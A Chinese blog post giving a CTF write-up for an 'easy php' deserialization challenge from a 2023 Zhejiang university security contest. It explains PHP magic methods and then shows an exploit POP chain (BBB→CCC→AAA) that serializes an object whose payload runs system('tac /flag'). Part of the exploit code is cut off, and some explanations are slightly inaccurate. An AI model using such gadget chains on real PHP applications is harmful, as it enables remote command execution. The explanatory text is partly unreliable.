反序列号漏洞解析及赛题分析
反序列号漏洞解析及赛题分析
原创 豆豆 豆豆咨询 2025-03-10 22:55
一、反序列号漏洞赛题解析
1.1 第一题
第六届浙江省大学生网络与信息安全竞赛 2023年 初赛/决赛 WEB方向 Writeup
easy php
简单反序列化
分析:
a. __toString()
在PHP中,Exception::__toString是一个魔术方法(Magic Method),用于定义当尝试将对象作为字符串输出时的行为。具体来说,当一个异常对象(通常是Exception类或其子类的实例)被当作字符串处理时(例如在echo语句中,或者在print函数中),PHP会自动调用该对象的__toString方法。这个方法的目的是提供一个可读的字符串表示形式,通常包含异常的描述信息、错误代码、文件路径、行号等,以便于开发者快速定位和解决问题。
class User {
private $name;
private $email;
public function __construct($name, $email) {
$this->name = $name;
$this->email = $email;
}
public function __toString() {
return “User: {$this->name}, Email: {$this->email}”;
}
}
$user = new User(“Alice”, “[email protected]”);
echo $user; // 输出 “User: Alice, Email: [email protected]”
__toString() 是 PHP 提供的一个魔术方法,用于定义对象在被转换为字符串时的行为。它在某些场景下显得非常有用,因为它让开发者可以控制对象在输出、拼接、打印时显示的内容。下面是__toString() 方法的详细解析和相关内容。
b. =>符号
在PHP中,“=>”符号用于定义一个键值对,即将一个键和一个值关联在一起。这种键值对的集合就是关联数组,也称为“哈希表”或“字典”。通过“=>”符号,可以指定一个键和对应的值之间的关系,使得数据在数组中可以按照键值对的形式进行存储和访问。
c.
[]
用途
[]在 PHP 中用于以下用途:
数组索引:获取或设置数组元素的值。
数组声明:声明包含元素的数组。
哈希表:声明键值对(PHP 7.4+)。
范围解析:解析变量或对象的范围。
可变变量名:创建包含变量名的变量。
例如
哈希表(键值对)
$hashTable = [‘name’ => ‘John Doe’, ‘age’ => 30];
echo $hashTable[‘name’]; // 输出:John Doe
BBB
::
__debuginfo
(
)
->
CCC
::
__toString
(
)
->
AAA
::
__call
(
)
d.
__debugInfo()
__debugInfo(): array
当通过 var_dump() 转储对象,获取应该要显示的属性的时候,该函数就会被调用。
var_dump() 函数用于输出变量的相关信息。
var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。
e.
tac 命令
从最后一行开始显示, tac 是 cat 的反向显示,
按行倒置输出。
f.writeup
cmd);
return “done”;
}
}
class BBB{
public $param1;
public function __debuginfo(){
return [
‘debugInfo’ => ‘param1′ . $this->param1
];
}
}
class CCC{
public $func;
public function __toString(){
var_dump(“aaa”);
$this->func->aaa();
}
}
$a=new BBB();
$a->param1=new CCC();
$a->param1->func=new AAA();
$a->param1->func->cmd=’system(\’tac /flag\’);’;
$aaa=serialize($a);
echo $aaa;
unserialize($aaa);
?>
参考文献
https://blog.csdn.net/Jayjay___/article/details/134426070
https://blog.csdn.net/qq_41643749/article/details/143732496